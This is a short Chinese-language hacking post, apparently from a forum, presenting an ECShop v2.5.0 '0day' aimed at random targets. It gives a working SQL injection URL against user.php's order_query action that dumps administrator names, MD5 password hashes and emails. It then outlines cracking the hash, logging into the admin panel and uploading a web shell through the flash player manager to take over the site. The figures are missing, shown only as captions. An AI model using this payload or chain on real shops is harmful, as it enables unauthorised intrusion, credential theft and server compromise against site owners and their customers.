漏洞来源：网络
PS:以后定期更新些高手放出来的0day。

ECShop v2.5.0
系统存在着注入漏洞，通过它我们可以获得后台权限。
随机目标
图1：

网站首页后跟代码
user.php?act=order_query&order_sn=' union select 1,2,3,4,5,6,concat(user_name,0x7c,password,0x7c,email),8 from ecs_admin_user/*
爆出管理员ID、MD5密码散列、E信箱
图2：

破解密码：
图3：

登陆后台界面，来到flash播放器管理界面上传网马
图4：

获得权限
图5：